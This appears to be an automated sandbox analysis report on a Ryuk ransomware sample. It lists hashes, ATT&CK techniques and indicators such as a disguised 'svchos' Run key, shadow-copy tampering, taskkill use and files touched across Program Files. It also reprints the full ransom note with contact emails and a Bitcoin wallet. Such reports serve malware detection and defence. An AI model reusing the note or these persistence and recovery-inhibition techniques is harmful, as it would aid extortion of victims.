ryuk | bf690b438268c48bfe5c73fad5c4acfe786c68eddeceecd3ac452d4e1832922c

Analysis

max time kernel
86s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
05-12-2024 11:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe
Size

79KB
MD5

6d7d0a07024e8e61ed94a14b96490f81
SHA1

a81ebdcfd566066d32d582a299fbbee946e4c310
SHA256

bf690b438268c48bfe5c73fad5c4acfe786c68eddeceecd3ac452d4e1832922c
SHA512

781328a9fd68ed362c5fd538e9e99dd1db8d800cb01b36fb7f1c57b865f747b55b1ae6fb45107d5a5306e8926ad9f08abfbfd9eefb116ee0ad27f711efeac177
SSDEEP

1536:uBzyvLtPO7Pr90tG3yEJ0gJVlp8swKDsGULa5UUc6ahF98aaTpflFTTJovD:uB2+90tiV0EdJNaZ9wpfltTJ

Score

10^/10

ryuk defense_evasion discovery execution impact persistence ransomware upx

Malware Config

Extracted

Path

F:\RyukReadMe.txt

Family

ryuk

Ransom Note

Gentlemen! Your business is at serious risk. There is a significant hole in the security system of your company. We've easily penetrated your network. You should thank the Lord for being hacked by serious people not some stupid schoolboys or dangerous punks. They can damage all your important data just for fun. Now your files are crypted with the strongest millitary algorithms RSA4096 and AES-256. No one can help you to restore files without our special decoder. Photorec, RannohDecryptor etc. repair tools are useless and can destroy your files irreversibly. If you want to restore your files write to emails (contacts are at the bottom of the sheet) and attach 2-3 encrypted files (Less than 5 Mb each, non-archived and your files should not contain valuable information (Databases, backups, large excel sheets, etc.)). You will receive decrypted samples and our conditions how to get the decoder. Please don't forget to write the name of your company in the subject of your e-mail. You have to pay for decryption in Bitcoins. The final price depends on how fast you write to us. Every day of delay will cost you additional +0.5 BTC Nothing personal just business As soon as we get bitcoins you'll get all your decrypted data back. Moreover you will get instructions how to close the hole in security and how to avoid such problems in the future + we will recommend you special software that makes the most problems to hackers. Attention! One more time ! Do not rename encrypted files. Do not try to decrypt your data using third party software. P.S. Remember, we are not scammers. We don`t need your files and your information. But after 2 weeks all your files and keys will be deleted automatically. Just send a request immediately after infection. All data will be restored absolutely. Your warranty - decrypted samples. contact emails [email protected] or [email protected] BTC wallet: 1NQ42zc51stA4WAVkUK8uqFAjo1DbWv4Kz Ryuk No system is safe

Emails

[email protected]

Wallets

1NQ42zc51stA4WAVkUK8uqFAjo1DbWv4Kz

Signatures

Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
ransomware ryuk
Ryuk family
ryuk
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Boot or Logon Autostart Execution: Active Setup 2 TTPs 2 IoCs

Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

persistence

Active Setup

T1547.014

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe

Drops startup file 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\RyukReadMe.txt	sihost.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchos = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe"	reg.exe

Enumerates connected drives 3 TTPs 18 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\D:	explorer.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\F:	explorer.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1840-0-0x00007FF6770A0000-0x00007FF6770D9000-memory.dmp	upx
behavioral2/memory/1840-2-0x00007FF6770A0000-0x00007FF6770D9000-memory.dmp	upx
behavioral2/memory/3884-393-0x00007FF6770A0000-0x00007FF6770D9000-memory.dmp	upx
behavioral2/memory/1840-3188-0x00007FF6770A0000-0x00007FF6770D9000-memory.dmp	upx
behavioral2/memory/2852-36448-0x00007FF6770A0000-0x00007FF6770D9000-memory.dmp	upx
behavioral2/memory/4032-36449-0x00007FF6770A0000-0x00007FF6770D9000-memory.dmp	upx

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\ipstr.xml	sihost.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\modules\sandbox.luac	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\sk-sk\RyukReadMe.txt	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\rhp_world_icon_hover.png	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\rhp_world_icon_hover.png	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\css\main.css	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\RyukReadMe.txt	sihost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Personal2019R_Trial-ul-oob.xrm-ms	sihost.exe
File opened for modification	C:\Program Files\SetRequest.asx	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\pl-pl\RyukReadMe.txt	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\cs-cz\RyukReadMe.txt	sihost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019R_Trial-ppd.xrm-ms	sihost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Professional2019R_Retail-ul-oob.xrm-ms	sihost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019DemoR_BypassTrial180-ul-oob.xrm-ms	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ko-kr\ui-strings.js	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\en-ae\RyukReadMe.txt	sihost.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\sr-Latn-RS.pak	sihost.exe
File opened for modification	C:\Program Files\Common Files\System\ado\es-ES\RyukReadMe.txt	sihost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\PublisherR_OEM_Perp-ul-phn.xrm-ms	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_folder-hover_32.svg	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\fi-fi\RyukReadMe.txt	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\icons_ie8.gif	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ko-kr\RyukReadMe.txt	sihost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectProMSDNR_Retail-pl.xrm-ms	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_organize_18.svg	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\sv-se\ui-strings.js	sihost.exe
File opened for modification	C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_GB\en_GB.aff	sihost.exe
File opened for modification	C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\SupplementalDictionaries\en_GB\excluded.txt	sihost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusinessEntryR_PrepidBypass-ul-oob.xrm-ms	sihost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioProVL_MAK-pl.xrm-ms	sihost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft Help\MS.EXCEL.16.1033.hxn	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\AddressBook2x.png	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\zh-tw\ui-strings.js	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\custom_poster.png	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\css\main-selector.css	sihost.exe
File opened for modification	C:\Program Files (x86)\Common Files\Microsoft Shared\ink\RyukReadMe.txt	sihost.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskmenu\RyukReadMe.txt	sihost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]	sihost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ARCTIC\ARCTIC.INF	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_folder-default_32.svg	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_sortedby_up_18.svg	sihost.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\javacpl.cpl	sihost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\PIXEL\PIXEL.ELM	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\it-it\RyukReadMe.txt	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ko-kr\RyukReadMe.txt	sihost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp-ul-oob.xrm-ms	sihost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000042\assets\assets\images\assets_picker-account-addPerson-48.png	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\S_IlluError_136x136.svg	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\en-gb\RyukReadMe.txt	sihost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365BusinessR_SubTrial-pl.xrm-ms	sihost.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\RyukReadMe.txt	sihost.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\legal\jdk\thaidict.md	sihost.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\RyukReadMe.txt	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\RyukReadMe.txt	sihost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\STRTEDGE\STRTEDGE.INF	sihost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\MondoR_OEM_Perp-ul-oob.xrm-ms	sihost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\StandardVL_MAK-pl.xrm-ms	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_ellipses_selected.svg	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon.png	sihost.exe
File opened for modification	C:\Program Files\Java\jre-1.8\legal\jdk\mesa3d.md	sihost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\OpenSSL64.DllA\RyukReadMe.txt	sihost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Templates\1033\Pitchbook.potx	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\forms_super.gif	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\RyukReadMe.txt	sihost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 36 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe

Interacts with shadow copies 3 TTPs 28 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
16564	vssadmin.exe
16740	vssadmin.exe
13404	vssadmin.exe
9976	vssadmin.exe
13324	vssadmin.exe
10572	vssadmin.exe
16700	vssadmin.exe
17072	vssadmin.exe
16984	vssadmin.exe
15420	vssadmin.exe
15620	vssadmin.exe
9696	vssadmin.exe
17448	vssadmin.exe
16428	vssadmin.exe
16516	vssadmin.exe
17572	vssadmin.exe
17608	vssadmin.exe
16620	vssadmin.exe
9536	vssadmin.exe
10556	vssadmin.exe
17420	vssadmin.exe
17636	vssadmin.exe
15596	vssadmin.exe
15656	vssadmin.exe
13608	vssadmin.exe
17492	vssadmin.exe
15748	vssadmin.exe
17216	vssadmin.exe

Kills process with taskkill 44 IoCs

evasion

pid	Process
2188	taskkill.exe
3456	taskkill.exe
1080	taskkill.exe
4524	taskkill.exe
3772	taskkill.exe
2540	taskkill.exe
1876	taskkill.exe
3788	taskkill.exe
3324	taskkill.exe
812	taskkill.exe
4112	taskkill.exe
636	taskkill.exe
2224	taskkill.exe
2656	taskkill.exe
456	taskkill.exe
1724	taskkill.exe
2908	taskkill.exe
3968	taskkill.exe
740	taskkill.exe
4712	taskkill.exe
4192	taskkill.exe
4456	taskkill.exe
4348	taskkill.exe
5008	taskkill.exe
3320	taskkill.exe
3632	taskkill.exe
3112	taskkill.exe
4904	taskkill.exe
2244	taskkill.exe
3312	taskkill.exe
2252	taskkill.exe
2036	taskkill.exe
4824	taskkill.exe
2136	taskkill.exe
1676	taskkill.exe
3848	taskkill.exe
1864	taskkill.exe
732	taskkill.exe
3904	taskkill.exe
2684	taskkill.exe
3596	taskkill.exe
1696	taskkill.exe
940	taskkill.exe
2092	taskkill.exe

Modifies registry class 24 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\WasEverActivated = "1"	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\CurrentWorkingDirectory	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\ManagedByApp	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHos = 6801000088020000	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\WasEverActivated = "1"	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\MuiCache	StartMenuExperienceHost.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\MuiCache	StartMenuExperienceHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1"	sihost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	explorer.exe
